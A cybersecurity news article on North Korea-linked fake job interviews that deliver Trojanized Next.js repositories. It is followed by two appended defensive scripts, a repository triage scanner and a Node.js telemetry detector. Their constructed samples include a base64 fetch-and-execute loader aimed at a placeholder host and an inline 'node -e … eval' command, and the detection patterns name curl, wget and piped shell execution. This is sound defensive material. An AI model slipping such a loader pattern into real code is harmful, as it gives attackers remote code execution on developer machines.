Security News

Cybersecurity news aggregator

Source: Dark Reading

Malicious Next.js Repos Target Developers Via Fake Job Interviews


Linked to North Korean fake job-recruitment campaigns, the poisoned repositories are aimed at establishing persistent access to infected machines.

Elizabeth Montalbano, Contributing Writer, February 25, 2026

Attackers are targeting developers with malicious Next.js repositories to gain remote code execution (RCE) and establish a persistent command-and-control (C2) channel on infected machines, in a campaign tied to North Korea's fake job-recruitment scams.

Microsoft sounded the alarm on the activity, which delivers malicious repositories disguised as legitimate Next.js projects and technical assessment materials. Researchers from Microsoft Defender Experts and the Microsoft Defender Security Research Team found several Trojanized repositories that offer different execution paths for delivering a backdoor to developer systems.

"The campaign uses multiple entry points that converge on the same outcome: runtime retrieval and local execution of attacker-controlled JavaScript that transitions into staged command-and-control," according to a blog post published Tuesday by the two Microsoft security teams.

Without formally attributing the campaign to North Korea, the researchers noted that the activity "aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution," a cluster associated with North Korea's Lazarus APT.
The blog post also links to third-party research from earlier this year on North Korean APT activity abusing Microsoft Visual Studio Code. North Korean actors have for years targeted developers by dangling job opportunities and, as part of a fake interview, asking candidates to complete sample development challenges that deliver malicious code to their machines.

"This developer-targeting campaign shows how a recruiting-themed 'interview project' can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend," the blog post stated.

The campaign's ultimate objective is execution on developer systems, which often hold high-value assets such as source code, environment secrets, and credentials for build or cloud resources, according to Microsoft. It demonstrates once again that developer workflows are a primary attack surface for cyber espionage and for activity that can lead to compromise of the wider software supply chain.

Repositories Leading to Backdoor Activity

The researchers discovered the campaign when Microsoft Defender flagged suspicious outbound connections from Node.js processes to attacker-controlled infrastructure; they traced the activity to a set of Next.js repositories that all exhibited the same malicious behavior. Next.js is a widely used open source Web development framework maintained by cloud software vendor Vercel.

The malicious repositories take one of two execution paths, each delivering a lightweight registration stage that establishes host identity, plus bootstrap code.
These stages lead to runtime retrieval and in-memory invocation of attacker-controlled JavaScript, which turns into a persistent C2 connection used to deliver further payloads and exfiltrate data from infected systems.

Some repositories abuse Visual Studio Code workspace automation: they include a .vscode/tasks.json configured to run a task automatically when the workspace is opened and trusted, which triggers a fetch-and-execute loader sequence via Node.js. Others embed obfuscated malicious logic directly in development assets, so that when a developer runs standard build commands or starts a development server, the disguised code decodes itself and fetches additional payloads. Either way, the developer does nothing beyond the ordinary steps of opening or starting a project.

Developer Attacks Rage On

North Korean cyberspies have been targeting developers with fake job opportunities since at least 2021, when security researchers documented the campaign known as Operation Dream Job, which sent fake job offers linking to malicious Web files. That campaign evolved into more sophisticated social-engineering attacks in which developers were lured into fake development projects or recruitment challenges that delivered spyware and other malware.

The latest discovery of weaponized Next.js repositories illustrates the threat actors' commitment to targeting developers, not only to establish a spy channel but also to poison the software supply chain as a whole. To defend against this, security operations teams and DevSecOps leaders "should treat developer workflows as a privileged attack surface, integrating IDE trust policies, behavioral analytics, and continuous monitoring into broader threat detection and response programs," according to Microsoft.
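The two delivery paths described above under "Repositories Leading to Backdoor Activity" are cheap to check for before a cloned "interview project" is ever opened in an IDE. The following Node.js script is an added example, not code from the article or from Microsoft: it walks an in-memory copy of a repository, flags any .vscode/tasks.json task set to run on folderOpen, flags package.json scripts that run inline or piped code, and flags source files that combine remote retrieval with dynamic execution. The sample repository, its file names and the placeholder host example.invalid are constructed for the demo.

```javascript
// Added example: static triage of a cloned repository for the two entry points
// the article describes. Not code from the article or from Microsoft's report.
// File contents, labels and the placeholder host example.invalid are constructed.
"use strict";

// tasks.json is JSONC: strip /* */ and whole-line // comments before parsing.
function parseJsonc(text) {
  return JSON.parse(text.replace(/\/\*[\s\S]*?\*\//g, "").replace(/^\s*\/\/.*$/gm, ""));
}

// Tasks VS Code starts by itself when the folder is opened and trusted.
function findAutoRunTasks(tasksJsonText) {
  const doc = parseJsonc(tasksJsonText);
  return (doc.tasks || [])
    .filter((t) => t.runOptions && t.runOptions.runOn === "folderOpen")
    .map((t) => ({ label: String(t.label || ""), command: String(t.command || "") }));
}

// Each pattern is weak on its own; the combination decode + fetch + execute
// in one file is the loader signature worth a high-severity finding.
const LOADER_PATTERNS = [
  { id: "base64-decode", re: /Buffer\.from\([^)]*['"]base64['"]\)|\batob\(/ },
  { id: "remote-fetch", re: /\bfetch\(|\bhttps?\.(?:get|request)\(/ },
  { id: "dynamic-exec", re: /\beval\(|new Function\(|vm\.runIn(?:This|New)Context\(|child_process/ },
  { id: "escaped-blob", re: /(?:\\x[0-9a-fA-F]{2}){6,}|(?:\\u[0-9a-fA-F]{4}){4,}/ },
];
const SOURCE_EXT = /\.(?:[cm]?js|[cm]?ts|jsx|tsx)$/;

function scanSource(path, text) {
  const hits = [];
  text.split("\n").forEach((line, i) => {
    for (const p of LOADER_PATTERNS) if (p.re.test(line)) hits.push({ path, line: i + 1, pattern: p.id });
  });
  return hits;
}

// files: { "relative/path": "contents" }, e.g. built from a git ls-files walk.
function triageRepo(files) {
  const findings = [];
  for (const [path, text] of Object.entries(files)) {
    if (path === ".vscode/tasks.json") {
      for (const t of findAutoRunTasks(text)) {
        findings.push({ path, severity: "high", reason: "task runs on folderOpen", detail: `${t.label}: ${t.command}` });
      }
    } else if (path === "package.json") {
      const scripts = JSON.parse(text).scripts || {};
      for (const [name, cmd] of Object.entries(scripts)) {
        if (/\bnode(?:\.exe)?\s+(?:-e|--eval)\b|\b(?:curl|wget)\b|\|\s*(?:sh|bash|node)\b/.test(cmd)) {
          findings.push({ path, severity: "medium", reason: `script "${name}" runs inline or piped code`, detail: cmd });
        }
      }
    } else if (SOURCE_EXT.test(path)) {
      const kinds = new Set(scanSource(path, text).map((h) => h.pattern));
      if (kinds.has("remote-fetch") && kinds.has("dynamic-exec")) {
        findings.push({ path, severity: "high", reason: "fetch-and-execute loader pattern", detail: [...kinds].sort().join(",") });
      } else if (kinds.size) {
        findings.push({ path, severity: "low", reason: "suspicious pattern(s)", detail: [...kinds].sort().join(",") });
      }
    }
  }
  return findings;
}

// Constructed sample repository mirroring both delivery paths.
const SAMPLE_REPO = {
  ".vscode/tasks.json": `{
  // VS Code accepts comments in this file
  "version": "2.0.0",
  "tasks": [{
    "label": "Install deps",
    "type": "shell",
    "command": "node ./scripts/bootstrap.js",
    "runOptions": { "runOn": "folderOpen" }
  }]
}`,
  "package.json": JSON.stringify({ name: "interview-task", scripts: { dev: "next dev", build: "next build" } }),
  "next.config.js": [
    "// base64 of the placeholder http://example.invalid/loader.js",
    "const u = Buffer.from('aHR0cDovL2V4YW1wbGUuaW52YWxpZC9sb2FkZXIuanM=', 'base64').toString();",
    "fetch(u).then((r) => r.text()).then((c) => new Function(c)());",
    "module.exports = { reactStrictMode: true };",
  ].join("\n"),
  "app/page.tsx": "export default function Page() { return <main>Interview task</main>; }",
};

if (typeof require !== "undefined" && require.main === module) {
  console.table(triageRepo(SAMPLE_REPO));
}
```

Pointing it at a real checkout means reading the files from disk (for instance the output of git ls-files) into the same path-to-contents map. It is a triage aid, not a verdict: heavier obfuscation can hide every pattern above, so the check belongs alongside VS Code's workspace-trust prompt and its task.allowAutomaticTasks setting, which together decide whether a folderOpen task runs at all.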
In practice, Microsoft recommends enforcing strict trust policies for IDEs such as Visual Studio Code; deploying attack surface reduction rules in Microsoft Defender for Endpoint to constrain risky script execution; and prioritizing visibility into unexpected Node.js execution patterns and anomalous outbound connections from developer endpoints.
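The last of those recommendations, visibility into unexpected Node.js execution and anomalous egress, can be prototyped against process and network events from an EDR or eBPF sensor. The script below is an added example, not the article's or Microsoft Defender's logic: it scores each node process on how it was started (spawned directly by the IDE, or running inline -e code), inherits suspicion down the process tree, and adds weight for every connection to a host outside a small allowlist, with extra weight for raw IP destinations and non-web ports. The JSON-lines event schema, hostnames, allowlist and weights are constructed assumptions.

```javascript
// Added example: behavioral detection over developer-endpoint telemetry, not code
// from the article or from Microsoft Defender. The event schema, hosts, allowlist
// and scoring weights are constructed assumptions for the demo.
"use strict";

// Node.js and IDE executables, matched on the last path segment (Linux/macOS/Windows).
const NODE_IMAGE = /(?:^|[\\/])node(?:\.exe)?$/i;
const IDE_IMAGE = /(?:^|[\\/])(?:code(?:-insiders)?(?:\.exe)?|Code Helper[^\\/]*)$/i;

// Destinations a Next.js developer's node processes routinely reach; tune per site.
const DEFAULT_ALLOWLIST = new Set(["localhost", "127.0.0.1", "::1", "registry.npmjs.org", "github.com"]);

// One JSON object per line with type "process" (pid, ppid, image, cmdline,
// parent_image) or "netconn" (pid, dest_host, dest_port).
function parseEvents(text) {
  return text.split("\n").filter((l) => l.trim()).map((l) => JSON.parse(l));
}

function isRawIp(host) {
  return /^\d{1,3}(?:\.\d{1,3}){3}$/.test(host) || host.includes(":");
}

// Returns alerts for node processes whose origin or network behavior is anomalous.
function detectSuspiciousNode(events, allowlist = DEFAULT_ALLOWLIST) {
  const procs = new Map();
  for (const e of events) {
    if (e.type !== "process" || !NODE_IMAGE.test(e.image)) continue;
    const p = { pid: e.pid, cmdline: e.cmdline, reasons: [], score: 0 };
    if (IDE_IMAGE.test(e.parent_image || "")) {
      p.reasons.push("node spawned directly by IDE (automatic task?)"); p.score += 2;
    }
    if (/\bnode(?:\.exe)?\s+(?:-e|--eval)\b/.test(e.cmdline || "")) {
      p.reasons.push("inline -e script"); p.score += 2;
    }
    const parent = procs.get(e.ppid);            // inherit suspicion down the tree
    if (parent && parent.score > 0) { p.reasons.push(`child of flagged pid ${parent.pid}`); p.score += 1; }
    procs.set(e.pid, p);
  }
  for (const e of events) {
    if (e.type !== "netconn") continue;
    const p = procs.get(e.pid);
    if (!p) continue;
    const host = String(e.dest_host || "").toLowerCase();
    if (allowlist.has(host)) continue;
    let w = 3;                                    // any non-allowlisted egress
    if (isRawIp(host)) w += 1;                    // no DNS name at all
    if (![80, 443].includes(e.dest_port)) w += 1; // non-web port
    p.reasons.push(`outbound to ${host}:${e.dest_port}`); p.score += w;
  }
  return [...procs.values()]
    .filter((p) => p.score >= 3)
    .sort((a, b) => b.score - a.score);
}

// Constructed telemetry: an IDE-launched bootstrap that spawns an inline node
// loader reaching an unknown host, and a dev server beaconing to a raw IP.
const SAMPLE_TELEMETRY = [
  '{"ts":"2026-02-25T09:14:03Z","type":"process","pid":4101,"ppid":3900,"image":"/usr/bin/node","cmdline":"node ./scripts/bootstrap.js","parent_image":"/usr/share/code/code"}',
  '{"ts":"2026-02-25T09:14:04Z","type":"netconn","pid":4101,"dest_host":"registry.npmjs.org","dest_port":443}',
  '{"ts":"2026-02-25T09:14:05Z","type":"process","pid":4102,"ppid":4101,"image":"/usr/bin/node","cmdline":"node -e fetch(process.env.U).then(r=>r.text()).then(eval)","parent_image":"/usr/bin/node"}',
  '{"ts":"2026-02-25T09:14:06Z","type":"netconn","pid":4102,"dest_host":"cdn-assets.example.invalid","dest_port":443}',
  '{"ts":"2026-02-25T09:20:00Z","type":"process","pid":5200,"ppid":3100,"image":"/usr/bin/node","cmdline":"node node_modules/.bin/next dev","parent_image":"/bin/bash"}',
  '{"ts":"2026-02-25T09:20:01Z","type":"netconn","pid":5200,"dest_host":"localhost","dest_port":3000}',
  '{"ts":"2026-02-25T09:20:30Z","type":"netconn","pid":5200,"dest_host":"203.0.113.45","dest_port":8080}',
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(detectSuspiciousNode(parseEvents(SAMPLE_TELEMETRY)), null, 2));
}
```

The threshold and the allowlist are the tuning surface: a build that legitimately pulls from an internal registry needs that host added, or every npm install pages someone. The IDE-parent signal alone stays below the alert threshold on purpose, because a trusted workspace can run benign tasks; it only matters once combined with unexpected egress or inline code, which is exactly the shape of the loader sequence the article describes.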